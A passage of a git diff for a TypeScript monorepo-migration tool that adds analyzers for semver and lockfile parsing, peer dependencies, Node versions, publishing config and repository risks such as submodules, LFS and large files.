+ suggestedAction: 'Consider adding CI for these packages in the monorepo workflow', + }); + } + + logger.debug(`CI analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/dependencies.ts b/src/analyzers/dependencies.ts index de5de30..7c3c466 100755 --- a/src/analyzers/dependencies.ts +++ b/src/analyzers/dependencies.ts @@ -1,4 +1,5 @@ import path from 'node:path'; +import semver from 'semver'; import type { PackageInfo, DependencyConflict, @@ -48,7 +49,8 @@ export function isWildcardVersion(version: string): boolean { } /** - * Parse a semver version string into components + * Parse a semver version 
string into components. + * Strips range operators (^, ~, >=, etc.) and extracts the base version. */ export function parseSemver(version: string): { major: number; minor: number; patch: number; prerelease?: string } | null { // Skip non-semver versions @@ -61,26 +63,53 @@ export function parseSemver(version: string): { major: number; minor: number; pa return null; } - // Remove leading ^, ~, =, >=, <=, <, > - const cleaned = version.replace(/^[\^~=><]+/, '').replace(/^>=|<=|>| use minimal satisfying version as canonical representative + const validRange = semver.validRange(trimmed, { loose: true }); + if (validRange) { + const min = semver.minVersion(validRange, { loose: true }); + if (min) { + return { + major: min.major, + minor: min.minor, + patch: min.patch, + prerelease: min.prerelease.length ? min.prerelease.join('.') : undefined, + }; + } + } - return { - major: parseInt(match[1], 10), - minor: parseInt(match[2], 10), - patch: parseInt(match[3], 10), - prerelease: match[4], - }; + // 3) Loose/coercible forms + const coerced = semver.coerce(trimmed, { loose: true }); + if (coerced) { + return { + major: coerced.major, + minor: coerced.minor, + patch: coerced.patch, + }; + } + } catch { + return null; + } + + return null; } /** - * Compare two semver versions + * Compare two semver versions using the semver package. 
* Returns: -1 if a < b, 0 if a == b, 1 if a > b */ function compareSemver(a: string, b: string): number { @@ -94,25 +123,9 @@ function compareSemver(a: string, b: string): number { if (!parsedA) return -1; // Non-semver goes first (lower priority) if (!parsedB) return 1; - // Compare major.minor.patch - if (parsedA.major !== parsedB.major) { - return parsedA.major - parsedB.major; - } - if (parsedA.minor !== parsedB.minor) { - return parsedA.minor - parsedB.minor; - } - if (parsedA.patch !== parsedB.patch) { - return parsedA.patch - parsedB.patch; - } - - // Handle pre-release (versions without pre-release are higher) - if (parsedA.prerelease && !parsedB.prerelease) return -1; - if (!parsedA.prerelease && parsedB.prerelease) return 1; - if (parsedA.prerelease && parsedB.prerelease) { - return parsedA.prerelease.localeCompare(parsedB.prerelease); - } - - return 0; + const verA = `${parsedA.major}.${parsedA.minor}.${parsedA.patch}${parsedA.prerelease ? `-${parsedA.prerelease}` : ''}`; + const verB = `${parsedB.major}.${parsedB.minor}.${parsedB.patch}${parsedB.prerelease ? 
`-${parsedB.prerelease}` : ''}`; + return semver.compare(verA, verB); } /** @@ -145,7 +158,11 @@ function determineConflictSeverity(versions: string[]): ConflictSeverity { /** * Read package.json from a directory */ -async function readPackageJson(repoPath: string, repoName: string): Promise { +async function readPackageJson( + repoPath: string, + repoName: string, + warnings: DependencyWarning[] +): Promise { const packageJsonPath = path.join(repoPath, 'package.json'); if (!(await pathExists(packageJsonPath))) { @@ -165,8 +182,14 @@ async function readPackageJson(repoPath: string, repoName: string): Promise { +async function findPackages( + repoPath: string, + repoName: string, + warnings: DependencyWarning[] +): Promise { const packages: PackageInfo[] = []; // First, read the root package.json - const rootPkg = await readPackageJson(repoPath, repoName); + const rootPkg = await readPackageJson(repoPath, repoName, warnings); if (rootPkg) { packages.push(rootPkg); } @@ -193,10 +220,14 @@ export interface DependencyWarning { name: string; version: string; source: string; - type: 'git' | 'file' | 'url' | 'wildcard' | 'prerelease'; + type: 'git' | 'file' | 'url' | 'wildcard' | 'prerelease' | 'parse-error'; message: string; } +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + /** * Detect conflicts between resolved versions across repos. 
*/ @@ -250,14 +281,24 @@ export async function analyzeDependencies( // Collect all packages from all repos for (const repo of repoPaths) { - const packages = await findPackages(repo.path, repo.name); + const packages = await findPackages(repo.path, repo.name, warnings); allPackages.push(...packages); } // Parse lockfiles for each repo const lockfileResolutions: LockfileResolution[] = []; for (const repo of repoPaths) { - const resolution = await parseLockfile(repo.path, repo.name); + const resolution = await parseLockfile(repo.path, repo.name, { + onParseWarning: (message) => { + warnings.push({ + name: 'lockfile', + version: 'invalid', + source: repo.name, + type: 'parse-error', + message, + }); + }, + }); if (resolution) { lockfileResolutions.push(resolution); } diff --git a/src/analyzers/environment.ts b/src/analyzers/environment.ts new file mode 100755 index 0000000..ac9db37 --- /dev/null +++ b/src/analyzers/environment.ts @@ -0,0 +1,89 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readFile, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +/** + * Analyze Node.js environment signals across repositories. + * Detects .nvmrc, .node-version, engines.node and flags mismatches. 
+ */ +export async function analyzeEnvironment( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const nodeVersions: Array<{ repo: string; source: string; version: string }> = []; + + for (const repo of repoPaths) { + // Check .nvmrc + const nvmrcPath = path.join(repo.path, '.nvmrc'); + if (await pathExists(nvmrcPath)) { + const content = (await readFile(nvmrcPath)).trim(); + nodeVersions.push({ repo: repo.name, source: '.nvmrc', version: content }); + } + + // Check .node-version + const nodeVersionPath = path.join(repo.path, '.node-version'); + if (await pathExists(nodeVersionPath)) { + const content = (await readFile(nodeVersionPath)).trim(); + nodeVersions.push({ repo: repo.name, source: '.node-version', version: content }); + } + + // Check engines.node in package.json + const pkgPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgPath)) { + try { + const pkg = (await readJson(pkgPath)) as Record; + const engines = pkg.engines as Record | undefined; + if (engines?.node) { + nodeVersions.push({ repo: repo.name, source: 'engines.node', version: engines.node }); + } + } catch (error) { + findings.push({ + id: `env-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax before running analysis.', + }); + } + } + + // Check for missing version indicators + const hasNvmrc = await pathExists(nvmrcPath); + const hasNodeVersion = await pathExists(nodeVersionPath); + if (!hasNvmrc && !hasNodeVersion) { + findings.push({ + id: `env-no-node-version-${repo.name}`, + title: `No Node.js version file in ${repo.name}`, + severity: 'info', + confidence: 'high', + evidence: [{ path: repo.path }], + suggestedAction: 'Add .nvmrc or .node-version file for consistent Node.js version', + }); + } + } + + // 
Detect mismatches + const uniqueVersions = [...new Set(nodeVersions.map((v) => v.version))]; + if (uniqueVersions.length > 1) { + findings.push({ + id: 'env-node-mismatch', + title: 'Inconsistent Node.js versions across repositories', + severity: 'warn', + confidence: 'high', + evidence: nodeVersions.map((v) => ({ + path: v.repo, + snippet: `${v.source}: ${v.version}`, + })), + suggestedAction: `Standardize on a single Node.js version. Detected: ${uniqueVersions.join(', ')}`, + }); + } + + logger.debug(`Environment analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/files.ts b/src/analyzers/files.ts index cd05340..187254f 100644 --- a/src/analyzers/files.ts +++ b/src/analyzers/files.ts @@ -71,7 +71,7 @@ export async function detectFileCollisions( sources.push(repo.name); fileMap.set(file, sources); } - } catch { + } catch (_err) { // Skip repos that can't be read } } @@ -110,7 +110,8 @@ export async function filesAreIdentical(file1: string, file2: string): Promise, + logger?: Logger, +): Promise { + const detections: LanguageDetection[] = []; + + for (const repo of repoPaths) { + const languages: LanguageDetection['languages'] = []; + + // Check Go + const goMod = path.join(repo.path, 'go.mod'); + if (await pathExists(goMod)) { + const content = await readFile(goMod); + const moduleMatch = content.match(/^module\s+(.+)$/m); + const metadata: Record = {}; + if (moduleMatch?.[1]?.trim()) { + metadata.module = moduleMatch[1].trim(); + } + languages.push({ + name: 'go', + markers: ['go.mod'], + ...(Object.keys(metadata).length > 0 ? 
{ metadata } : {}), + }); + } + + // Check Rust + const cargoToml = path.join(repo.path, 'Cargo.toml'); + if (await pathExists(cargoToml)) { + const content = await readFile(cargoToml); + const nameMatch = content.match(/^\[package\][\s\S]*?name\s*=\s*"([^"]+)"/m); + const metadata: Record = {}; + if (nameMatch?.[1]) { + metadata.crate = nameMatch[1]; + } + languages.push({ + name: 'rust', + markers: ['Cargo.toml'], + ...(Object.keys(metadata).length > 0 ? { metadata } : {}), + }); + } + + // Check Python + const pyproject = path.join(repo.path, 'pyproject.toml'); + const requirements = path.join(repo.path, 'requirements.txt'); + if (await pathExists(pyproject)) { + languages.push({ + name: 'python', + markers: ['pyproject.toml'], + }); + } else if (await pathExists(requirements)) { + languages.push({ + name: 'python', + markers: ['requirements.txt'], + }); + } + + if (languages.length > 0) { + detections.push({ + repoName: repo.name, + languages, + }); + } + } + + logger?.info(`Detected ${detections.reduce((sum, d) => sum + d.languages.length, 0)} non-JS language(s)`); + return detections; +} diff --git a/src/analyzers/lockfile.ts b/src/analyzers/lockfile.ts index 0a7105f..4031743 100755 --- a/src/analyzers/lockfile.ts +++ b/src/analyzers/lockfile.ts @@ -1,13 +1,114 @@ import path from 'node:path'; +import yaml from 'js-yaml'; +import semver from 'semver'; import type { LockfileResolution } from '../types/index.js'; import { pathExists, readFile } from '../utils/fs.js'; +interface ParseLockfileOptions { + onParseWarning?: (message: string) => void; +} + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? 
error.message : String(error); +} + +function normalizeResolvedVersion(version: string): string { + return version + .replace(/^npm:/, '') + .replace(/\(.*$/, '') + .replace(/_.+$/, '') + .trim(); +} + +function choosePreferredVersion(existing: string | undefined, incoming: string): string { + if (!existing) return incoming; + if (existing === incoming) return existing; + + const existingParsed = semver.coerce(existing, { includePrerelease: true, loose: true }); + const incomingParsed = semver.coerce(incoming, { includePrerelease: true, loose: true }); + + if (existingParsed && incomingParsed) { + return semver.gt(incomingParsed, existingParsed) ? incoming : existing; + } + if (!existingParsed && incomingParsed) return incoming; + return existing; +} + +function setResolvedVersion( + target: Record, + name: string, + rawVersion: string +): void { + const version = normalizeResolvedVersion(rawVersion); + if (!name || !version) return; + target[name] = choosePreferredVersion(target[name], version); +} + +function extractYarnPackageName(selector: string): string | null { + const trimmed = selector.trim().replace(/^["']|["']$/g, ''); + if (!trimmed || trimmed.startsWith('__')) return null; + + if (trimmed.startsWith('@')) { + const secondAt = trimmed.indexOf('@', 1); + if (secondAt <= 1) return null; + return trimmed.slice(0, secondAt); + } + + const atIndex = trimmed.indexOf('@'); + if (atIndex <= 0) return null; + return trimmed.slice(0, atIndex); +} + +function extractNpmPackageNameFromPath(pkgPath: string): string | null { + if (!pkgPath.startsWith('node_modules/')) return null; + const relative = pkgPath.slice('node_modules/'.length); + const segments = relative.split('/'); + + if (segments[0]?.startsWith('@')) { + if (segments.length < 2) return null; + return `${segments[0]}/${segments[1]}`; + } + return segments[0] || null; +} + +function parsePnpmPackageKey(rawKey: string): { name: string; version: string } | null { + const key = rawKey.replace(/^\//, 
'').replace(/\(.*$/, ''); + + // New style: name@1.2.3 or @scope/name@1.2.3 + const atIndex = key.lastIndexOf('@'); + if (atIndex > 0 && key[atIndex - 1] !== '/') { + return { + name: key.slice(0, atIndex), + version: normalizeResolvedVersion(key.slice(atIndex + 1)), + }; + } + + // Old slash style: /name/1.2.3 or /@scope/name/1.2.3 + const scopedSlashMatch = key.match(/^(@[^/]+\/[^/]+)\/([^/]+)$/); + if (scopedSlashMatch) { + return { + name: scopedSlashMatch[1], + version: normalizeResolvedVersion(scopedSlashMatch[2]), + }; + } + const unscopedSlashMatch = key.match(/^([^/@][^/]*)\/([^/]+)$/); + if (unscopedSlashMatch) { + return { + name: unscopedSlashMatch[1], + version: normalizeResolvedVersion(unscopedSlashMatch[2]), + }; + } + + return null; +} + /** * Try each lockfile format in a repo dir. Returns null if none found. */ export async function parseLockfile( repoPath: string, - repoName: string + repoName: string, + options: ParseLockfileOptions = {} ): Promise { // Try pnpm-lock.yaml const pnpmLockPath = path.join(repoPath, 'pnpm-lock.yaml'); @@ -18,8 +119,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'pnpm', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${pnpmLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse ${pnpmLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -32,8 +140,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'yarn', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${yarnLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse 
${yarnLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -46,8 +161,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'npm', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${npmLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse ${npmLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -55,61 +177,81 @@ export async function parseLockfile( } /** - * Parse pnpm-lock.yaml — extract dependency versions. + * Parse pnpm-lock.yaml — extract dependency versions using js-yaml. * Supports both lockfileVersion >= 6 (importers format) and older flat format. */ export function parsePnpmLock(content: string): Record { const result: Record = {}; try { - // Detect lockfile version - const versionMatch = content.match(/lockfileVersion:\s*'?(\d+(?:\.\d+)?)'?/); - const lockfileVersion = versionMatch ? parseFloat(versionMatch[1]) : 0; + const lockData = yaml.load(content) as Record | null; + if (!lockData || typeof lockData !== 'object') return result; + + const lockfileVersion = typeof lockData.lockfileVersion === 'string' + ? parseFloat(lockData.lockfileVersion) + : typeof lockData.lockfileVersion === 'number' + ? lockData.lockfileVersion + : 0; + // Modern format (lockfileVersion >= 6): importers['.'] dependency sections if (lockfileVersion >= 6) { - // Modern format: importers['.'].dependencies / devDependencies - // Look for importers > '.' 
> dependencies/devDependencies sections - const importersMatch = content.match(/importers:\s*\n\s+['.]?\.?['.]?:\s*\n([\s\S]*?)(?=\nimporters:|\npackages:|\nlockfileVersion:|\n\S|$)/); - if (importersMatch) { - const importerBlock = importersMatch[1]; - // Match entries like: package-name: - // specifier: ^1.0.0 - // version: 1.2.3 - const entryPattern = /^\s{6,8}(\S+):\s*\n\s+specifier:.*\n\s+version:\s*['"]?([^('"\n\s]+)/gm; - let match; - while ((match = entryPattern.exec(importerBlock)) !== null) { - const name = match[1].replace(/^['"]|['"]$/g, ''); - const version = match[2].replace(/\(.*$/, '').trim(); - result[name] = version; + const importers = lockData.importers as Record> | undefined; + const rootImporter = importers?.['.']; + if (rootImporter) { + for (const section of ['dependencies', 'devDependencies', 'optionalDependencies'] as const) { + const deps = rootImporter[section] as Record | undefined; + if (deps && typeof deps === 'object') { + for (const [name, entry] of Object.entries(deps)) { + if (typeof entry === 'string') { + setResolvedVersion(result, name, entry); + continue; + } + if (entry && typeof entry === 'object') { + const resolved = (entry as { version?: string }).version; + if (typeof resolved === 'string') { + setResolvedVersion(result, name, resolved); + } + } + } + } } } } // Flat format (older) or fallback: root-level dependencies/devDependencies if (Object.keys(result).length === 0) { - // Match root dependencies: section - const sections = ['dependencies:', 'devDependencies:']; - for (const sectionHeader of sections) { - const sectionRegex = new RegExp( - `^${sectionHeader}\\s*\\n((?:\\s{2}\\S.*\\n)*)`, - 'm' - ); - const sectionMatch = content.match(sectionRegex); - if (sectionMatch) { - const lines = sectionMatch[1].split('\n'); - for (const line of lines) { - // Match " package-name: version" or " package-name: 'version'" - const lineMatch = line.match(/^\s{2}(\S+):\s+['"]?([^'"\n\s]+)/); - if (lineMatch) { - const name = 
lineMatch[1].replace(/^['"]|['"]$/g, ''); - result[name] = lineMatch[2]; + for (const section of ['dependencies', 'devDependencies', 'optionalDependencies'] as const) { + const deps = lockData[section] as Record> | undefined; + if (deps && typeof deps === 'object') { + for (const [name, value] of Object.entries(deps)) { + if (typeof value === 'string') { + setResolvedVersion(result, name, value); + } else if (typeof value === 'object' && value !== null && 'version' in value) { + setResolvedVersion(result, name, String((value as { version: unknown }).version)); } } } } } - } catch { - // Return empty on any parse error + + // Fallback to packages map if importer/root dependency sections are absent. + if (Object.keys(result).length === 0 && lockData.packages && typeof lockData.packages === 'object') { + for (const [rawKey, value] of Object.entries(lockData.packages as Record)) { + const parsed = parsePnpmPackageKey(rawKey); + if (!parsed) continue; + + if (value && typeof value === 'object' && 'version' in (value as Record)) { + const explicitVersion = (value as { version?: string }).version; + if (typeof explicitVersion === 'string') { + setResolvedVersion(result, parsed.name, explicitVersion); + continue; + } + } + setResolvedVersion(result, parsed.name, parsed.version); + } + } + } catch (_err) { + // pnpm lock parse error; return empty } return result; @@ -123,31 +265,39 @@ export function parseYarnLock(content: string): Record { const result: Record = {}; try { - const isBerry = content.includes('__metadata:'); - - if (isBerry) { - // Berry format: "name@npm:range": - // version: x.y.z - const entryPattern = /^"?(@?[^@\n"]+)@(?:npm:)?[^":\n]*"?:\s*\n\s+version:?\s+["']?(\d+\.\d+\.\d+[^"'\n\s]*)["']?/gm; - let match; - while ((match = entryPattern.exec(content)) !== null) { - const name = match[1].trim(); - // Skip __metadata and other special entries - if (name.startsWith('__') || name.includes('workspace:')) continue; - result[name] = match[2]; + const lines = 
content.split(/\r?\n/); + let activeSelectors: string[] = []; + + for (const line of lines) { + const trimmed = line.trim(); + if (!trimmed) continue; + + // Entry header line, e.g. + // "react@^18.0.0": + // "react@^18.0.0, react@^18.2.0": + if (!line.startsWith(' ') && trimmed.endsWith(':')) { + activeSelectors = trimmed + .slice(0, -1) + .split(',') + .map((selector) => selector.trim().replace(/^["']|["']$/g, '')) + .filter(Boolean); + continue; } - } else { - // Classic v1 format: "name@range", name@range: - // version "x.y.z" - const entryPattern = /^"?(@?[^@\n"]+)@[^:\n]*"?:\s*\n\s+version\s+"([^"]+)"/gm; - let match; - while ((match = entryPattern.exec(content)) !== null) { - const name = match[1].trim(); - result[name] = match[2]; + + if (activeSelectors.length === 0) continue; + + const versionMatch = line.match(/^\s+version:?\s+["']?([^"'\s]+)["']?/); + if (!versionMatch) continue; + + const version = versionMatch[1]; + for (const selector of activeSelectors) { + const packageName = extractYarnPackageName(selector); + if (!packageName) continue; + setResolvedVersion(result, packageName, version); } } - } catch { - // Return empty on any parse error + } catch (_err) { + // yarn lock parse error; return empty } return result; @@ -165,16 +315,13 @@ export function parsePackageLock(content: string): Record { // v2/v3 format uses "packages" key if (lockData.packages && typeof lockData.packages === 'object') { for (const [pkgPath, pkgData] of Object.entries(lockData.packages)) { - // Skip root package (empty string key) and nested node_modules - if (!pkgPath.startsWith('node_modules/')) continue; - - // Only direct dependencies (no nested node_modules) - const relativePath = pkgPath.slice('node_modules/'.length); - if (relativePath.includes('node_modules/')) continue; - + // Skip root package (empty string key). 
+ if (!pkgPath) continue; + const depName = extractNpmPackageNameFromPath(pkgPath); + if (!depName) continue; const data = pkgData as { version?: string }; if (data.version) { - result[relativePath] = data.version; + setResolvedVersion(result, depName, data.version); } } } @@ -188,12 +335,12 @@ export function parsePackageLock(content: string): Record { for (const [name, data] of Object.entries(lockData.dependencies)) { const depData = data as { version?: string }; if (depData.version) { - result[name] = depData.version; + setResolvedVersion(result, name, depData.version); } } } - } catch { - // Return empty on any parse error + } catch (_err) { + // package-lock.json parse error; return empty } return result; diff --git a/src/analyzers/peers.ts b/src/analyzers/peers.ts index 70cc37e..65ef742 100755 --- a/src/analyzers/peers.ts +++ b/src/analyzers/peers.ts @@ -1,91 +1,50 @@ +import semver from 'semver'; import type { PackageInfo, DependencyConflict, LockfileResolution, ConfidenceLevel, } from '../types/index.js'; -import { parseSemver } from './dependencies.js'; +import { getHighestVersion } from './dependencies.js'; -/** - * Basic semver range satisfaction check. - * Supports ^, ~, >=, exact match. Complex ranges (||, -) return false. 
- */ -export function satisfiesRange(version: string, range: string): boolean { - const trimmed = range.trim(); +function normalizeToSemver(version: string): string | null { + try { + const exact = semver.valid(version, { loose: true }); + if (exact) return exact; - // Complex ranges — cannot reliably check - if (trimmed.includes('||') || trimmed.includes(' - ')) { - return false; - } - - const parsed = parseSemver(version); - if (!parsed) return false; - - // Exact match - if (/^\d+\.\d+\.\d+/.test(trimmed)) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - return ( - parsed.major === rangeParsed.major && - parsed.minor === rangeParsed.minor && - parsed.patch === rangeParsed.patch - ); - } - - // Caret range: ^major.minor.patch — compatible with major - if (trimmed.startsWith('^')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - - if (rangeParsed.major > 0) { - // ^1.2.3 means >=1.2.3 <2.0.0 - if (parsed.major !== rangeParsed.major) return false; - if (parsed.minor < rangeParsed.minor) return false; - if (parsed.minor === rangeParsed.minor && parsed.patch < rangeParsed.patch) return false; - return true; + const validRange = semver.validRange(version, { loose: true }); + if (validRange) { + const min = semver.minVersion(validRange, { loose: true }); + if (min) return min.version; } - // ^0.x — compatible with minor - if (parsed.major !== 0) return false; - if (parsed.minor !== rangeParsed.minor) return false; - if (parsed.patch < rangeParsed.patch) return false; - return true; - } - // Tilde range: ~major.minor.patch — compatible with minor - if (trimmed.startsWith('~')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - if (parsed.major !== rangeParsed.major) return false; - if (parsed.minor !== rangeParsed.minor) return false; - if (parsed.patch < rangeParsed.patch) return false; - return true; + const coerced = semver.coerce(version, { loose: true }); + if (coerced) 
return coerced.version; + } catch { + return null; } - // >= range - if (trimmed.startsWith('>=')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - if (parsed.major > rangeParsed.major) return true; - if (parsed.major < rangeParsed.major) return false; - if (parsed.minor > rangeParsed.minor) return true; - if (parsed.minor < rangeParsed.minor) return false; - return parsed.patch >= rangeParsed.patch; - } - - return false; + return null; } /** - * Check if a range is "complex" — contains || or hyphen ranges. + * Semver range satisfaction check using the semver package. + * Handles all range types including complex ranges (||, hyphen, etc.). */ -function isComplexRange(range: string): boolean { - return range.includes('||') || range.includes(' - '); +export function satisfiesRange(version: string, range: string): boolean { + const cleanVersion = normalizeToSemver(version); + if (!cleanVersion) return false; + + try { + return semver.satisfies(cleanVersion, range, { includePrerelease: true, loose: true }); + } catch { + return false; + } } /** * Check if peerDep ranges are satisfied by available dependency versions. - * Returns conflicts with confidence 'medium' (or 'low' for complex ranges), - * conflictSource 'peer-constraint'. + * Returns conflicts with confidence 'high', conflictSource 'peer-constraint'. 
*/ export function analyzePeerDependencies( packages: PackageInfo[], @@ -129,44 +88,19 @@ export function analyzePeerDependencies( if (!bestVersion) { const versions = declaredVersions.get(peerDepName); if (versions && versions.length > 0) { - // Use the first declared version (stripped of range prefixes) as approximation - const parsed = parseSemver(versions[0]); - if (parsed) { - bestVersion = `${parsed.major}.${parsed.minor}.${parsed.patch}`; - } + const bestDeclared = getHighestVersion(versions); + const normalized = normalizeToSemver(bestDeclared); + if (normalized) bestVersion = normalized; } } // If no version found at all, skip (can't validate) if (!bestVersion) continue; - const complex = isComplexRange(peerRange); - const confidence: ConfidenceLevel = complex ? 'low' : 'medium'; - - // For complex ranges, we can't reliably check, so report with low confidence - if (complex) { - conflicts.push({ - name: peerDepName, - versions: [ - { - version: peerRange, - source: `${pkg.repoName} (peer)`, - type: 'peerDependencies', - }, - { - version: bestVersion, - source: 'available', - type: 'dependencies', - }, - ], - severity: 'major', - confidence, - conflictSource: 'peer-constraint', - }); - continue; - } + // semver.satisfies handles all range types (^, ~, ||, hyphen, etc.) + // Use 'high' confidence since the semver package is authoritative + const confidence: ConfidenceLevel = 'high'; - // Check satisfaction if (!satisfiesRange(bestVersion, peerRange)) { conflicts.push({ name: peerDepName, diff --git a/src/analyzers/publishing.ts b/src/analyzers/publishing.ts new file mode 100755 index 0000000..d0d54c5 --- /dev/null +++ b/src/analyzers/publishing.ts @@ -0,0 +1,121 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? 
error.message : String(error); +} + +/** + * Analyze publishing configuration across repositories. + * Detects publishConfig, private:false, registry settings, etc. + */ +export async function analyzePublishing( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const publishablePackages: Array<{ repo: string; name: string; registry?: string }> = []; + + for (const repo of repoPaths) { + const pkgPath = path.join(repo.path, 'package.json'); + if (!(await pathExists(pkgPath))) continue; + + try { + const pkg = (await readJson(pkgPath)) as Record; + const isPrivate = pkg.private === true; + const publishConfig = pkg.publishConfig as Record | undefined; + const pkgName = (pkg.name as string) || repo.name; + + // Detect publishable packages + if (!isPrivate) { + publishablePackages.push({ + repo: repo.name, + name: pkgName, + registry: publishConfig?.registry, + }); + + if (!publishConfig) { + findings.push({ + id: `publishing-no-config-${repo.name}`, + title: `${repo.name} is publishable but has no publishConfig`, + severity: 'info', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: `private: ${pkg.private ?? 
'undefined'}` }], + suggestedAction: 'Add publishConfig with access and registry settings', + }); + } + } + + // Detect custom registries + if (publishConfig?.registry && publishConfig.registry !== 'https://registry.npmjs.org/') { + findings.push({ + id: `publishing-custom-registry-${repo.name}`, + title: `${repo.name} uses a custom registry`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: `registry: ${publishConfig.registry}` }], + suggestedAction: 'Ensure the custom registry is accessible from the monorepo CI', + }); + } + + // Detect files/main/exports configuration + if (!isPrivate) { + const hasMain = !!pkg.main; + const hasExports = !!pkg.exports; + const hasFiles = !!pkg.files; + + if (!hasMain && !hasExports) { + findings.push({ + id: `publishing-no-entry-${repo.name}`, + title: `${repo.name} has no main or exports field`, + severity: 'info', + confidence: 'medium', + evidence: [{ path: pkgPath }], + suggestedAction: 'Add main or exports field to package.json for proper module resolution', + }); + } + + if (!hasFiles) { + findings.push({ + id: `publishing-no-files-${repo.name}`, + title: `${repo.name} has no files field`, + severity: 'info', + confidence: 'medium', + evidence: [{ path: pkgPath }], + suggestedAction: 'Add files field to limit published package contents', + }); + } + } + } catch (error) { + findings.push({ + id: `publishing-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax before assessing publishing configuration.', + }); + } + } + + // Summary finding + if (publishablePackages.length > 0) { + const registries = [...new Set(publishablePackages.map((p) => p.registry).filter(Boolean))]; + if (registries.length > 1) { + findings.push({ + id: 'publishing-multiple-registries', + title: 'Multiple npm registries in use', + 
severity: 'warn', + confidence: 'high', + evidence: publishablePackages + .filter((p) => p.registry) + .map((p) => ({ path: p.repo, snippet: `registry: ${p.registry}` })), + suggestedAction: 'Standardize on a single registry or configure per-package publishConfig', + }); + } + } + + logger.debug(`Publishing analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/repo-risks.ts b/src/analyzers/repo-risks.ts new file mode 100755 index 0000000..1da6028 --- /dev/null +++ b/src/analyzers/repo-risks.ts @@ -0,0 +1,113 @@ +import path from 'node:path'; +import fs from 'fs-extra'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readFile, listFiles } from '../utils/fs.js'; + +const LARGE_FILE_THRESHOLD = 1_000_000; // 1 MB + +/** + * Analyze repository risks: submodules, LFS, large files, case collisions. + */ +export async function analyzeRepoRisks( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + + for (const repo of repoPaths) { + // Check for git submodules + const gitmodulesPath = path.join(repo.path, '.gitmodules'); + if (await pathExists(gitmodulesPath)) { + const content = await readFile(gitmodulesPath); + const submoduleCount = (content.match(/\[submodule/g) || []).length; + findings.push({ + id: `risk-submodules-${repo.name}`, + title: `${repo.name} contains git submodules`, + severity: 'error', + confidence: 'high', + evidence: [{ path: gitmodulesPath, snippet: `${submoduleCount} submodule(s)` }], + suggestedAction: 'Submodules must be resolved before migration. 
Inline or replace with npm dependencies.', + }); + } + + // Check for LFS + const gitattrsPath = path.join(repo.path, '.gitattributes'); + if (await pathExists(gitattrsPath)) { + const content = await readFile(gitattrsPath); + if (content.includes('filter=lfs')) { + const lfsPatterns = content + .split('\n') + .filter((l) => l.includes('filter=lfs')) + .map((l) => l.split(' ')[0]); + findings.push({ + id: `risk-lfs-${repo.name}`, + title: `${repo.name} uses Git LFS`, + severity: 'warn', + confidence: 'high', + evidence: lfsPatterns.map((p) => ({ + path: gitattrsPath, + snippet: `LFS tracked: ${p}`, + })), + suggestedAction: 'Ensure Git LFS is configured in the monorepo. LFS-tracked files must be migrated carefully.', + }); + } + } + + // Scan for large files (only root-level to avoid perf issues) + try { + const files = await listFiles(repo.path); + for (const file of files) { + const filePath = path.join(repo.path, file); + try { + const stat = await fs.stat(filePath); + if (stat.size > LARGE_FILE_THRESHOLD) { + findings.push({ + id: `risk-large-file-${repo.name}-${file}`, + title: `Large file in ${repo.name}: ${file}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: filePath, snippet: `${(stat.size / 1_000_000).toFixed(1)} MB` }], + suggestedAction: 'Consider using Git LFS or removing large files before migration', + }); + } + } catch (err) { + logger.debug?.('Failed to stat file ' + filePath + ': ' + (err instanceof Error ? err.message : String(err))); + } + } + } catch (err) { + logger.debug?.('Failed 